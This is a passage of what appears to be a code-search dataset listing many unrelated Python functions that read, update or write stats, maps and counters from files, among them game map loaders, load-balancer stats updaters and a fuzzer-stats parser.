Write it.\n current_stats[host][current_key] = state\n\n # write stats\n open(CONFIG['stats_file'], 'w').write(json.dumps(current_stats))", "def refreshMTimes(self):\n del self.mtimesReset[:]\n for fileName, fileInfo in self.data.items():\n oldMTime = self.mtimes.get(fileName,fileInfo.mtime)\n self.mtimes[fileName] = oldMTime\n #--Reset mtime?\n if fileInfo.mtime != oldMTime and oldMTime != -1:\n fileInfo.setMTime(oldMTime)\n self.mtimesReset.append(fileName)", "def load_from_file(self, file):\n\n if (args.replacetopip): #create list of IP addresses and the number of times they occur\n with open(args.dirty) as dirty_file:\n for line in dirty_file:\n ip = self._extract_by_key(line, self._attr_key)\n if (self.ip_dict.has_key(ip)):\n self.ip_dict[ip] += 1\n else:\n self.ip_dict[ip] = 1\n #sort list\n self.top_ip = sorted(self.ip_dict.items(), key=operator.itemgetter(1), reverse=True)\n count = 0\n with open(file) as ip_file:\n for line in ip_file:\n if (args.replacetopip): #replace top IP addresses from the sorted list with new ones from the file\n ip_old = self.top_ip[count][0]\n ip_new = line.strip()\n count += 1\n else:\n ip_old,ip_new = line.split(\",\")\n self._insts[ip_old] = ip_new.strip()", "def fromfile(self,file):\n self.d.update(params_file(file))", "def update_stats(self, idx, key):\n\n stats = self.stats\n if not stats.has_key(idx):\n stats[idx] = {}\n if stats[idx].has_key(key):\n stats[idx][key] += 1\n else:\n stats[idx][key] = 1", "def stats(self, stats):\n self._stats = stats", "def map_file(self, map_file):\n\n self._map_file = map_file", "def get_member_stats(self):\n self.mstats = {}\n # add in members from expanded_def (which includes any merges)\n for qid in self.expanded_def.keys():\n # check for trailing quantity specifier (!, *, +, ?). Not for name space.\n # ! - required (default), * - 0 or more, + - 1 or more, ? - 0 or 1\n id, qty = self.file.parse_qty(qid, \"!\")\n if id in self.mstats.keys():\n print \"** Error, duplicate (%s) id in group\" % id\n traceback.print_stack()\n sys.exit(1)\n type = 'group' if id.endswith('/') else 'dataset'\n self.mstats[id] = { 'ns': self.sdef['ns'], 'qty': qty,\n 'df': self.expanded_def[qid], 'created': [], 'type': type }\n # add in members from any includes\n # print \"** processing includes\"\n for qidq in self.includes:\n qid, qty = self.file.parse_qty(qidq, \"!\")\n # print \"processing include\", qid\n sdef = self.file.get_sdef(qid, self.sdef['ns'], \"Referenced in include\")\n # print \"obtained sdef:\"\n # pp.pprint(sdef)\n modifiers = self.includes[qidq]\n if len(modifiers) > 0:\n # need to incorporate modifications to definition of included child members\n df = copy.deepcopy(sdef['df'])\n # self.modify(df, modifiers)\n self.merge(df, modifiers) # merges modifiers into definition\n # print \"df after merging modifiers:\"\n else:\n df = sdef['df']\n # print \"df after copy:\"\n id = sdef['id']\n type = sdef['type']\n # pp.pprint(df)\n # qty = '!' 
# assume includes are required\n if id in self.mstats.keys():\n print \"** Error, duplicate (%s) id in group, referenced by include\" % id\n traceback.print_stack()\n sys.exit(1)\n self.mstats[id] = { 'ns': self.sdef['ns'], 'qty': qty,\n 'df': df, 'created': [], 'type': type }\n # print \"after processing all includes, mstats is:\"\n # pp.pprint(self.mstats)", "def load_stats(self, result, **kwargs):\n p_stat = result.get('player_stats').get('stats')\n if not p_stat:\n raise ValueError('No stats for player')\n stat_list = p_stat.get('stat')\n for item in stat_list:\n key = item.get('stat_id')\n value = int(item.get('value'))\n self.stat_data[key] = value", "def loadRatingScoreMappingFromFile(file):\n\treturn \\\n\tcompose(\n\t\tdict\n\t , partial(map, lambda line: ((line[0], line[1]), line[2]))\n\t , partial(takewhile, lambda line: len(line) > 2 and line[0] != '')\n\t , lambda t: t[1]\n\t , lambda lines: (pop(lines), lines)\n\t , fileToLines\n \t , partial(join, getDataDirectory())\n\t)(file)", "def updateRequestStats(self, request, stats):\n # this stats dict will be validated on the server side\n self.updateRequestProperty(request, stats)", "def update_freq_dist(filename):\r\n pass", "def updateAll(data):\n if (data.updatePositions):\n data.groups.player.update(data)\n data.groups.projectiles.update(data)\n data.groups.monsters.update(data)\n data.groups.spawners.update(data)", "def update_from_file(self, filename):\n ns = {}\n with open(filename) as handle:\n code = compile(handle.read(), filename, 'exec')\n exec(code, ns)\n values = {\n key: value\n for key, value in ns.items()\n if not key.startswith('_')\n }\n self.__dict__.update(values)", "def _update_counters(self, filepath, step):\n\n counters = {}\n\n # Load\n if os.path.exists(self.counters_file):\n with open(self.counters_file) as f:\n counters = json.load(f)\n\n counters[filepath] = dict(step=step)\n\n # Save\n with open(self.counters_file, \"w\") as f:\n json.dump(counters, f, indent=4)", "def update_stats(self):\n\n self.raw_data_index = 0\n start_time = time.time()\n data_frame = load_data(self.selections)\n user_stats = get_user_stats(data_frame)\n\n self.time_stats_data.config(text=get_time_stats(data_frame))\n self.station_stats_data.config(text=get_station_stats(data_frame))\n self.trip_stats_data.config(text=get_trip_duration_stats(data_frame))\n\n self.user_stats_data.config(text=user_stats[0])\n self.gender_stats_data.config(text=user_stats[1])\n self.age_stats_data.config(text=user_stats[2])\n self.status.config(\n text=f\"Updated statistics in {round((time.time() - start_time), 2)} seconds. 
Modify filters using left radio buttons as desired...\"\n )", "def load_data_map(self):\n with open(\"map/maps.txt\") as maps:\n for x_axis, line in enumerate(maps):\n self.x_axis = x_axis\n self.full_map.insert(x_axis, [])\n for y_axis, case in enumerate(line.strip()):\n self.y_axis = y_axis\n if case == \"D\":\n self.full_map[x_axis].insert(y_axis, \"M\")\n self.user.position = (x_axis, y_axis)\n elif case == \"A\":\n self.full_map[x_axis].insert(y_axis, \"A\")\n elif case == \"_\":\n self.full_map[x_axis].insert(y_axis, \"_\")\n elif case == \"#\":\n self.full_map[x_axis].insert(y_axis, \"#\")", "def update_map(mapping, map_file):\n #Replace commas in mapping string with newlines\n mapping = mapping.replace(',', '\\n')\n\n try:\n with open(map_file, 'w') as f:\n f.write(mapping)\n except IOError as e:\n logging.error(\"Can not write %s\", map_file)\n logging.error(e)", "def stats(self, stats):\n\n self._stats = stats", "def update_data(self, url, file_name):\n if file_name == 'upcoming':\n r = self.gosu\n # Thread(target=self.update_upcoming_matches_teams, args=(r,)).start()\n else:\n r = requests.get(url)\n r = r.json()\n with open('files/' + file_name + '.json', 'w') as f:\n json.dump(r, f, indent=4)\n with open('files/' + file_name + '.txt', 'w') as f_: # update date\n f_.write(str(time.time()))", "def _update_offset_file(self):\n if self.on_update:\n self.on_update()\n offset = self._filehandle().tell()\n inode = stat(self.filename).st_ino\n fh = open(self._offset_file, \"w\")\n fh.write(\"%s\\n%s\\n\" % (inode, offset))\n fh.close()\n self._since_update = 0", "def statistics_update(self, node, population, size, mtime, cluster=0):\n\n qs = (\"select population, size from statistics \"\n \"where node = ? and cluster = ?\")\n qu = (\"insert or replace into statistics \"\n \"(node, population, size, mtime, cluster) \"\n \"values (?, ?, ?, ?, ?)\")\n self.execute(qs, (node, cluster))\n r = self.fetchone()\n if r is None:\n prepopulation, presize = (0, 0)\n else:\n prepopulation, presize = r\n population += prepopulation\n population = max(population, 0)\n size += presize\n self.execute(qu, (node, population, size, mtime, cluster))", "def update_file2(infile,outfile,energy_dict,mat):\n\n with open(infile,'r+') as f:\n with open(outfile,'w+') as of:\n matfile = \"{} {}\".format(mat,2151)\n for line in f:\n #if(we're in file 2: res's)\n if(matfile in line):\n for ekey in energy_dict:\n #if( we find the res )\n if ekey in line:\n linelist = list(line)\n for i,channel_pair in enumerate(energy_dict[ekey]):\n channel_number = channel_pair[0]\n channel_value = channel_pair[1]\n start = 11*channel_number\n end = 11+start\n linelist[start:end] = endf_float_str(channel_value)\n line = \"\".join(linelist)\n of.write(line)", "def _update_database_map(self, path):\n if path:\n filename = path + '/APD_MAP.txt'\n else:\n filename = 'APD_MAP.txt'\n filepointer = open(filename, 'w')\n for invariom, molecule in self.map.items():\n filepointer.write(invariom + ':' + molecule + '\\n')\n filepointer.close()", "def _update_stat_json(self, stat_name):\n\n pass", "def update_stats(self, health_message):\n session = db_api.get_session()\n\n amphora_id = health_message['id']\n listeners = health_message['listeners']\n for listener_id, listener in listeners.items():\n\n stats = listener.get('stats')\n stats = {'bytes_in': stats['rx'], 'bytes_out': stats['tx'],\n 'active_connections': stats['conns'],\n 'total_connections': stats['totconns'],\n 'request_errors': stats['ereq']}\n LOG.debug(\"Updating listener stats 
in db and sending event.\")\n LOG.debug(\"Listener %s / Amphora %s stats: %s\",\n listener_id, amphora_id, stats)\n self.listener_stats_repo.replace(\n session, listener_id, amphora_id, **stats)\n\n listener_stats = self.get_listener_stats(session, listener_id)\n self.emit(\n 'listener_stats', listener_id, listener_stats.get_stats())\n\n listener_db = self.repo_listener.get(session, id=listener_id)\n lb_stats = self.get_loadbalancer_stats(\n session, listener_db.load_balancer_id)\n self.emit('loadbalancer_stats',\n listener_db.load_balancer_id, lb_stats.get_stats())", "def update(self, namein, nameout):\n\t\ttext = self.dict.sub(self.readFile(namein))\n\t\tself.writeFile(nameout, text)\n\t\treturn", "def process_file(self, data, filename):\n\n if data:\n data = self.update_province_info(data)\n self.get_province_info(data, filename)", "def load_map(self, filename, player=None):\n\n # Close out any old map we have\n self.close_world()\n\n # Now load the new one\n # TODO: check for exceptions, etc.\n (self.world, self.worlddf) = StarboundData.open_world(filename)\n\n if self.world:\n base_filename = os.path.basename(filename)\n self.loaded_filename = filename\n self.set_title()\n if self.world.info.coords:\n self.data_table.set_world_coords(*self.world.info.coords[:2])\n else:\n self.data_table.clear_world_coords()\n self.data_table.set_world_size(*self.world.info.size)\n # We're duplicating some work from Player.get_worlds() here, but\n # consolidating everything would be tricky, and in the end I\n # figured it wouldn't be worth it.\n match = re.match(r'(.*)-([0-9a-f]{32})-(\\d+).(temp)?world', base_filename)\n if match:\n self.data_table.set_world_name(match.group(1))\n self.data_table.set_world_type('Non-Planet System Object')\n self.data_table.set_world_extra('')\n elif filename.endswith('.shipworld'):\n self.data_table.set_world_name('Starship')\n self.data_table.set_world_type('Your Starship')\n self.data_table.set_world_extra('')\n elif self.world.info.name:\n self.data_table.set_world_name(StarboundData.strip_colors(self.world.info.name))\n self.data_table.set_world_type(self.world.info.description)\n self.data_table.set_world_extra(', '.join(self.world.info.world_biomes))\n else:\n self.data_table.set_world_name(base_filename)\n self.data_table.set_world_type('Unknown')\n self.data_table.set_world_extra('')\n self.scene.load_map(self.world)\n\n # Jump to a Mech Beacon, if we have it\n if self.world.get_entity_uuid_coords('mechbeacon') != None:\n self.add_navigation_item('mechbeacon', 'Go to Mech Beacon')\n\n # Update our player-dependent navigation menu actions\n if player:\n\n # Current Player Location\n if player.cur_world_filename and player.cur_world_filename == base_filename:\n self.navigation_actions.append(\n self.navmenu.addAction(\n 'Go to Player Location ({:d}, {:d})'.format(*map(int, player.cur_world_loc)),\n lambda: self.action_to_coords(*player.cur_world_loc),\n ))\n\n # Player Bookmarks\n if base_filename in player.bookmarks:\n marks = player.bookmarks[base_filename]\n for mark in sorted(marks):\n self.add_navigation_item(mark.uuid, 'Go to Bookmark: {}'.format(mark.name))\n else:\n # TODO: Handle this better, too.\n raise Exception('World not found')\n\n # Update menu state, potentially\n self.enforce_menu_state()", "def callback_UpdateMap(cm, mod_units, window):\n for mod in mod_units:\n # Boost is not implemented yet, just a potential way to link different\n # bioprocesses together via sideFlows.\n # Ex) swtichgrass as a source of extra cellulose\n\n if mod[0:5] != 
'boost':\n # Updates a mod of the window . . .\n window[mod].update(cm[mod]['name'])\n\n return None", "def enter_dict(update_dict, path=\"current_request.txt\"):\n\n request_dict = RequestFileCom.file_to_dict(path)\n\n # Make sure no one changes the file content before finishes to update it.\n RequestFileCom.mutex.acquire()\n\n for key in update_dict:\n\n request_dict[key] = update_dict[key]\n\n request_file_string = \"\"\n\n for key in request_dict:\n\n request_file_string += key + \"::\" + request_dict[key] + \"\\n\"\n\n # Update the file.\n with open(path, \"w\") as f:\n\n f.write(request_file_string)\n\n RequestFileCom.mutex.release()\n\n request_dict = RequestFileCom.file_to_dict(path)", "def parse_user_mod(path):\n mod = np.loadtxt(path, delimiter=',')\n return {'vs': np.append(mod[:, 0], 100), 'hl': mod[:, 1]}", "def update_calculated_stats(self, player_data):\n # Updates calculated statistics\n fga = player_data['FGA']\n fgm = player_data['FGM']\n pa3 = player_data['3FGA']\n pm3 = player_data['3FGM']\n try:\n player_data['FG%'] = fgm/fga\n except:\n player_data['FG%'] = 0.0\n try:\n player_data['3FG%'] = pm3/pa3\n except:\n player_data['3FG%'] = 0.0\n return(player_data)", "def update_field_stats(self, tweet):\n\n stats = self.stats\n for f in self.tweet_fields:\n if tweet.has_key(f):\n f_val = tweet[f]\n if f_val is None:\n continue\n if stats[f].has_key(f_val):\n stats[f][f_val] += 1\n else:\n stats[f][f_val] = 1", "def test_load_stats(self):\n data = {'a': 'b'}\n stats_file = self._write('stats.json', data)\n settings = {\n 'webpack.stats_file': stats_file,\n }\n state = WebpackState(settings)\n stats = state.load_stats()\n self.assertEqual(stats, data)", "def update_maps(self, meta_config):\n with open(meta_config, 'r') as configs:\n assert configs.readline().strip('\\r\\n') == METACONF_FLAG # Check/skip the multi-map flag\n for map_config in re.split('[\\\\r\\\\n]+', configs.read()):\n\n # If it's a blank line, ignore it\n if map_config == '':\n continue\n\n map_name = Config.initConf(map_config).get('DEFAULT', 'dataset')\n\n # If the name of a map isn't in map_services, initialize it\n if map_name not in self.map_services.keys():\n map_service = Map(map_config)\n self.map_services[map_service.name] = map_service\n\n # If the config file has been updated, start a new MapService for it\n if os.path.getmtime(map_config) != self.map_services[map_name].last_update:\n self.map_services[map_name] = Map(map_config)\n\n # indicate that map_services has been updated\n self.map_services['_last_update'] = os.path.getmtime(meta_config)", "def get_adjusted_stat_data(loc, stat_code):\n stat_data = {\"000\": None, \"090\": None, \"ver\": None, \"t\": None, \"name\": None}\n g = 981.0 # cm/s^2\n stat_data[\"000\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"000\"]))\n stat_data[\"090\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"090\"]))\n stat_data[\"ver\"], num_pts, dt, shift = readGP(loc, \".\".join([stat_code, \"ver\"]))\n\n stat_data[\"000\"], num_pts, dt = adjust_for_time_delay(stat_data[\"000\"], dt, shift)\n stat_data[\"090\"], num_pts, dt = adjust_for_time_delay(stat_data[\"090\"], dt, shift)\n stat_data[\"ver\"], num_pts, dt = adjust_for_time_delay(stat_data[\"ver\"], dt, shift)\n\n t = np.arange(num_pts) * dt\n stat_data[\"t\"] = t\n\n stat_data[\"name\"] = stat_code\n return stat_data", "def update_stats(self, datastruct):\n counter = datastruct.counter\n stats_dict = datastruct.compute_stats()\n if counter == 0:\n self.box1.addstr(5, 2, 
self.STATS_INIT)\n else:\n self.box1.move(2, 1)\n self.box1.clrtobot()\n self.box1.box()\n if datastruct.last_hits == 0:\n self.box1.addstr(5, 2, self.STATS_SECTION0 + str(datastruct.counter))\n self.box1.addstr(8, 2, self.STATS_NOTRAFFIC)\n else:\n self.box1.addstr(5, 2, self.STATS_SECTION0 + str(datastruct.counter))\n self.box1.addstr(8, 2, self.STATS_SECTION1 + str(datastruct.last_hits))\n self.box1.addstr(11, 2, self.STATS_SECTION2)\n for index, (section, hits) in enumerate(stats_dict[\"top_sections\"]):\n self.box1.addstr(13+2*index, 4, str(index + 1) + \".\" + section + \":\" + str(hits))\n self.box1.addstr(20, 2, self.STATS_SECTION3)\n for index, (user, hits) in enumerate(stats_dict[\"top_users\"]):\n self.box1.addstr(22+2*index, 4, str(index + 1) + \".\" + user + \":\" + str(hits))\n self.box1.addstr(29, 2, self.STATS_SECTION4)\n for index, (error, hits) in enumerate(stats_dict[\"errors\"]):\n self.box1.addstr(31+2*index, 4, str(index + 1) + \".\" + error + \":\" + str(hits))\n self.box1.addstr(38, 2, self.STATS_SECTION5 + str(datastruct.last_traffic))\n self._refresh_screen()", "def updateCounts(self):\n found = False\n fileName = \"counts\"\n if not os.access(fileName, os.F_OK):\n try:\n TFH = open(fileName, \"w\")\n TFH.close()\n except IOError as inst: # @UnusedVariable\n self.logIt(__name__ + \".updateCounts(): Unable to open \" + fileName + \" for write.\" + \" => \" + str(\n inst.errno) + \":\" + str(inst.strerror) + \"\\n\")\n raise\n\n self.logIt(__name__ + \".updateCounts(): fileName=\" + fileName + \"\\n\")\n try:\n FH = open(fileName, \"rb+\")\n # FH = posixfile.open(fileName, \"rb+\") # posixfile has been deprecated.\n # FH.lock('w|')\n data = None\n while 1:\n data = str(FH.readline())\n if data is None or data == \"\": break\n data = re.sub(\"\\n\", \"\", data)\n self.debug(__name__ + \".updateCounts(): data is \" + str(data) + \"\\n\")\n ms = str(self.msgNum) + \"=\"\n self.debug(__name__ + \".updateCounts(): ms is\" + str(ms) + \"\\n\")\n if re.search(ms, data):\n found = True\n self.debug(__name__ + \".updateCounts(): DEBUG0.5\\n\")\n break\n self.debug(__name__ + \".updateCounts(): DEBUG1\\n\")\n if data and found:\n self.debug(__name__ + \".updateCounts(): DEBUG2\\n\")\n eloc = FH.tell()\n self.debug(__name__ + \".updateCounts(): eloc=\" + str(eloc) + \"\\n\")\n sloc = eloc - len(data) - 1\n self.debug(__name__ + \".updateCounts(): sloc=\" + str(sloc) + \"\\n\")\n FH.seek(sloc, os.SEEK_SET)\n cloc = FH.tell()\n self.debug(__name__ + \".updateCounts(): cloc=\" + str(cloc) + \"\\n\")\n myList = list()\n myList = data.split('=')\n icount = int(myList[1]) + 1\n FH.write(str(self.msgNum) + \"=\" + str(icount) + \"\\n\")\n else:\n self.debug(__name__ + \".updateCounts(): DEBUG3\\n\")\n FH.write(str(self.msgNum) + \"=1\" + \"\\n\")\n FH.lock('u')\n FH.close()\n except IOError as inst: # @UnusedVariable\n pass\n # self.logIt( __name__ + \".updateCounts(): Unable to open \" + fileName + \" for write.\" + \" => \" + str( inst.errno ) + \":\" + str( inst.strerror ) + \"\\n\" )\n # Endtry", "def Read_MapGen(filename,stats = False):\n from numpy import array\n with open(filename,'rt') as file_:\n data = [s.strip() for s in file_.readlines()]\n\n Shorelines = []\n segment = []\n for line in data:\n if line == \"# -b\": #New segment beginning\n if segment: Shorelines.append(array(segment))\n segment = []\n else:\n segment.append(map(float,string.split(line)))\n if segment: Shorelines.append(array(segment))\n\n if stats:\n NumSegments = len(Shorelines)\n NumPoints = False\n for 
segment in Shorelines:\n NumPoints = NumPoints + len(segment)\n AvgPoints = NumPoints / NumSegments\n print(\"Number of Segments: \", NumSegments)\n print(\"Average Number of Points per segment: \", AvgPoints)\n\n return Shorelines", "def loadData(self, file):\n self.data = batchImport(file, self.ps)", "def add_sysinfo(loot_id, filename):\n\n loot = get_loot_entry(loot_id)\n with open(filename, 'r') as f:\n sysinfo = f.read()\n if not sysinfo:\n return None\n f = StringIO(sysinfo)\n reader = csv.reader(f, delimiter=',')\n result = []\n for row in reader:\n result.append(row)\n if not result:\n return None\n result = dict(zip(result[0], result[1]))\n result['IPs'] = result['IPs'].split()\n result = json.dumps(result)\n loot.sysinfo = result\n _db.session.commit()\n log.info(\"Sysinfo entry added - %s\" % loot_id)", "def Read_MapGen(self, filename, stats = 0,AllLines=0):\n with open(filename,'rt') as file_:\n data = [s.strip() for s in file_]\n\n Shorelines = []\n segment = []\n for line in data:\n if line:\n if line == \"# -b\": #New segment beginning\n if segment: Shorelines.append(N.array(segment))\n segment = []\n else:\n segment.append([float(e) for e in line.split()])\n if segment: Shorelines.append(N.array(segment))\n\n if stats:\n NumSegments = len(Shorelines)\n NumPoints = 0\n for segment in Shorelines:\n NumPoints = NumPoints + len(segment)\n AvgPoints = NumPoints / NumSegments\n print(\"Number of Segments: \", NumSegments)\n print(\"Average Number of Points per segment: \", AvgPoints)\n if AllLines:\n Lines = []\n for segment in Shorelines:\n Lines.append(segment[0])\n for point in segment[1:-1]:\n Lines.append(point)\n Lines.append(point)\n Lines.append(segment[-1])\n return Lines\n else:\n return Shorelines", "def update_team_data(self, team_file, team_updates):\n data = self.read_team_data(team_file)\n with open(self.team_path + team_file, 'w') as f:\n for update in team_updates:\n data[update] = team_updates[update]\n json.dump(team_updates,f)\n f.close()\n return True", "def update_stats(self, stats, delta, sample_rate=1):\n if not isinstance(stats, list):\n stats = [stats]\n\n data = dict((stat, \"%s|c\" % delta) for stat in stats)\n self.send(data, sample_rate)", "def _load_tracker(self):\n\n if os.path.isfile(config.TRACKER_JSON):\n with self.__writelock, open(config.TRACKER_JSON, encoding='utf-8-sig') as f:\n d = json.loads(f.read())\n try:\n self.stats.previous_requests = d[self.maps.key]\n except KeyError:\n self.stats.previous_requests = 0\n else:\n self.stats.previous_requests = 0", "def update_plugin_data(self, entry):", "def set_stats(self, stats):\n self._stats = stats", "def calculate_stats(file_data: dict) -> dict:\n specifics = {\n 'assignments': 0,\n 'grade': 0,\n 'graded': 0,\n 'discussion': 0\n }\n for course in file_data['semester_no_dup_crn']:\n x = course.split(DELIMITER)\n if int(x[ASSIGNMENTS]) > 0:\n specifics['assignments'] += 1\n if int(x[GRADE]) > 2:\n specifics['grade'] += 1\n if int(x[GRADED]) > 0:\n specifics['graded'] += 1\n if int(x[DISCUSSION]) > 0:\n specifics['discussion'] += 1\n return {'semester': file_data['semester'],\n 'courses_with_usage': len(file_data['semester_no_dup_crn']),\n 'faculty_with_usage': len(file_data['semester_no_dup_r']),\n 'full_time': len(file_data['full_time']),\n 'total_full_time': file_data['len_full'],\n 'part_time': len(file_data['part_time']),\n 'total_part_time': file_data['len_part'],\n 'staff': len(file_data['staff']),\n 'specifics': specifics,\n 'total_courses': file_data['total_courses']}", "def 
update_data(self):\n for sai_id_key in self.if_id_map:\n namespace, sai_id = mibs.split_sai_id_key(sai_id_key)\n if_idx = mibs.get_index_from_str(self.if_id_map[sai_id_key])\n counter_table = self.namespace_db_map[namespace].get_all(mibs.COUNTERS_DB, \\\n mibs.counter_table(sai_id))\n if counter_table is None:\n counter_table = {}\n self.if_counters[if_idx] = counter_table\n\n\n self.lag_name_if_name_map, \\\n self.if_name_lag_name_map, \\\n self.oid_lag_name_map, _, _ = Namespace.get_sync_d_from_all_namespace(mibs.init_sync_d_lag_tables, self.db_conn)\n\n self.if_range = sorted(list(self.oid_name_map.keys()) + list(self.oid_lag_name_map.keys()))\n self.if_range = [(i,) for i in self.if_range]", "def LoadMapping(self, fname):\n\n M = [{} for i in range(N_ChanUIDS)]\n\n # Load Map:\n with open(fname, \"r\") as f:\n pass", "def readMembers(self):\n f = open('%s/raw_clumpmembers_%s' %(self.wd,self.file), 'rb')\n #Skip first and last entries from this array.\n data = np.fromfile(f, dtype='i')[1:-1]\n self.nclumps = max(data)\n members = {}\n # I think we don't want ID==0 as this refers to no clump (CHECK...)\n for clump in range(self.nclumps):\n membershold = np.argwhere(data==clump+1).flatten()\n members[clump] = membershold\n self.members = members", "def updateFileInfo(self, data, pid):\n self.db.updateLinkInfo(data)\n self.evm.dispatchEvent(\"packageUpdated\", pid)", "def updatestats(self):\n result = self.statsfromcounts(self.hypCountByScenario)\n self.pScenario = result[\"p\"]\n self.scenarioEntropy = result[\"entropy\"]", "def setStats(self, stats):\n self.stats = stats", "def updateMap(self):\n self.clearMap()\n self.neofetchwin, self.neofetch, self.values = self.detect_neofetch()\n self.neofetch_parser(self.values)", "def UpdateData(self,WaveName,Data):\n if (self.UseCache):\n FilePath = self.DataToFile(WaveName,Data)\n self.WaveNameMap[WaveName] = FilePath\n else:\n self.WaveNameMap[WaveName] = Data", "def update_json_file(self):\n with open(\"data/save.txt\", \"r+\") as file:\n dictionary = json.load(file)\n user = dictionary[\"Actual Username\"]\n dictionary[user].append(self.score)\n\n with open(\"data/save.txt\", \"w\") as file:\n json.dump(dictionary, file, indent=3, sort_keys=True)", "def update_data(self, start=None, end=None):\n if self.verbose:\n print(\"Updating data\")\n start, end = self.get_range(start, end)\n self.source_data = self.get_dict_from_range(start, end)\n for c in self.callbacks[\"update_data\"]:\n c()", "def stat_file(self, path, info):\n return {}", "def update_usage_stats(self):\n self._usage.increment_usage_stats()", "def __init__(self, stats_file):\n stats = dict()\n self._stats = dict()\n\n for line in stats_file:\n stat = next((regex.match(line).groupdict()\n for regex in FUZZER_STATS_RES if regex.match(line)),\n dict())\n stats.update(stat)\n\n if not stats:\n raise Exception('Empty fuzzer_stats file `%s`' % stats_file.name)\n\n # Automatically create class attributes based on the fuzzer_stats fields\n for k, v in stats.items():\n if k == 'command_line':\n afl_opts = None\n target_args = None\n getopt_error = None\n\n for afl_getopt in AFL_GETOPTS:\n try:\n afl_opts, target_args = getopt(v.split(), afl_getopt)\n break\n except GetoptError as e:\n getopt_error = e\n\n if not afl_opts or not target_args:\n raise getopt_error\n\n setattr(self, 'afl_cmdline', afl_opts)\n setattr(self, 'target_cmdline', target_args)\n else:\n # If convertable to a number, treat as a number\n try:\n v = float(v)\n except ValueError:\n pass\n\n setattr(self, k, v)\n 
self._stats[k] = v", "def process(self):\n self._processed = True\n # We need to load up previous section_maps info\n with open(os.path.join(self.home, 'section_maps'), 'rb') as _file:\n section_maps = pickle.load(_file)\n\n # This will ensure that sections persist with the same -a, -b nomenclature over time\n self.groups.section_maps = section_maps\n self.groups.period_info = {}\n\n super().process()", "def do_stat (self, line) :\n\t\tf = line.strip()\n\n\t\tif not f :\n\t\t\ttarget = self.__wd\n\n\t\telse :\n\t\t\tif self.exists(f) :\n\t\t\t\ttarget = self.__wd['content'][f]\n\t\t\telse :\n\t\t\t\treturn\n\n\t\tfor k in target.keys() :\n\t\t\tif k != 'content' :\n\t\t\t\tprint \"\t%s : %s\" % ( k, target[k] )", "def update_mod_database():\r\n\tmydb = database()\r\n\tcursor = mydb.cursor()\r\n\tmod_path = \"data/stats.json\"\r\n\tinfo = dict_from_json_file(mod_path)\r\n\tcursor.execute(\"DELETE FROM poe.mod\")\t# Clear table\r\n\tfor mod_type in info[\"result\"]:\r\n\t\tfor mod in mod_type[\"entries\"]:\r\n\t\t\tmod_id = mod[\"id\"]\r\n\t\t\tmod_text = mod[\"text\"]\r\n\t\t\tmod_type = mod[\"type\"]\r\n\t\t\t# If the mod has options we need to add these to the options table\r\n\t\t\tif \"option\" in mod:\r\n\t\t\t\tquery = \"INSERT INTO poe.mod (id, text, type, options) VALUES (%s, %s, %s, %s);\"\r\n\t\t\t\tval = (mod_id, mod_text, mod_type, 1)\r\n\t\t\t\tcursor.execute(query, val)\r\n\t\t\t\tfor option_mod in mod[\"option\"][\"options\"]:\r\n\t\t\t\t\toption_mod_id = option_mod[\"id\"]\r\n\t\t\t\t\toption_mod_text = option_mod[\"text\"]\r\n\t\t\t\t\tmod_query \t= \"INSERT INTO poe.options (mod_id, id, text) VALUES (%s, %s, %s)\"\r\n\t\t\t\t\tmod_val \t= (mod_id, option_mod_id, option_mod_text)\r\n\t\t\t\t\tcursor.execute(mod_query, mod_val)\r\n\t\t\t# If there are no mods, simply add the mod to the table\r\n\t\t\telse:\r\n\t\t\t\tquery = \"INSERT INTO poe.mod (id, text, type) VALUES (%s, %s, %s);\"\r\n\t\t\t\tval = (mod_id, mod_text, mod_type)\r\n\t\t\t\tcursor.execute(query, val)\r\n\tmydb.commit()", "def sum_ticks(file_path: str) -> dict:\n try:\n parsed_ticks = handle_replay(file_path)\n except zephyrus_sc2_parser.exceptions.ReplayDecodeError:\n print(f\"Error: replay could not be decoded {file_path}\")\n return\n except Exception:\n print(traceback.format_exc())\n return\n\n league = pathlib.Path(file_path).parent.name\n out = []\n for player in parsed_ticks:\n player_data = {'league': league, 'race': player.race}\n for type in parsed_ticks[player]:\n for datapoint in parsed_ticks[player][type]:\n player_data[type] = player_data.get(type, 0) + datapoint['percent']\n out.append(player_data)\n\n return out", "def load(self):\n file_name = common.RANK_FILE % (self.week.season.name, self.week.num)\n with open(file_name, 'r') as rank_file:\n for record in rank_file:\n team, score = common.parse(record)\n self.score[team] = score", "def register_stats(self, stats):\n assert stats.endswith(\".h5\") or stats.endswith(\".npy\")\n if stats.endswith(\".h5\"):\n mean = read_hdf5(stats, \"mean\").reshape(-1)\n scale = read_hdf5(stats, \"scale\").reshape(-1)\n else:\n mean = np.load(stats)[0].reshape(-1)\n scale = np.load(stats)[1].reshape(-1)\n self.register_buffer(\"mean\", torch.from_numpy(mean).float())\n self.register_buffer(\"scale\", torch.from_numpy(scale).float())\n logging.info(\"Successfully registered stats as buffer.\")", "def update_cds(self, line, cds):\n args = self.extract_cds_args(line)\n cds.add_indices(args['indices'])\n cds.add_phase(args['phase'])\n 
cds.add_identifier(args['identifier'])\n if 'score' in args:\n cds.add_score(args['score'])", "def gather_sample(self, stat_file, collector=None):\n if not collector:\n collector = {}\n # The file format is just a single line of all the fields.\n line = stat_file.readlines()[0]\n # Chop off first part which is the pid and executable file. The\n # executable file is terminated with a paren so just search for that.\n line = line[(line.find(\") \") + 2) :]\n fields = line.split()\n # Then the fields we want are just at fixed field positions in the\n # string. Just grab them.\n\n # See http://man7.org/linux/man-pages/man5/proc.5.html for reference on field numbers\n # Keep in mind that we chop first 3 values away (pid, command line, state), so you need to\n # subtract 3 from the field numbers from the man page (e.g. on the man page nice is number\n # 19, but in our case it's 16 aka 19 - 3)\n process_uptime = self.__get_uptime_ms() - self.calculate_time_ms(\n int(fields[19])\n )\n\n collector.update(\n {\n Metric(\"app.cpu\", \"user\"): self.__calculate_time_cs(int(fields[11])),\n Metric(\"app.cpu\", \"system\"): self.__calculate_time_cs(int(fields[12])),\n Metric(\"app.uptime\", None): process_uptime,\n Metric(\"app.nice\", None): float(fields[16]),\n Metric(\"app.threads\", None): int(fields[17]),\n Metric(\"app.mem.majflt\", None): int(fields[9]),\n Metric(\"app.io.wait\", None): int(fields[39])\n if len(fields) >= 39\n else 0,\n }\n )\n return collector", "def load(self):\n file = os.path.join(\"./data\", self.name + \".map\")\n with open(file) as fp:\n lines = fp.readlines()\n self.row, self.col = map(int, lines[0].split())\n 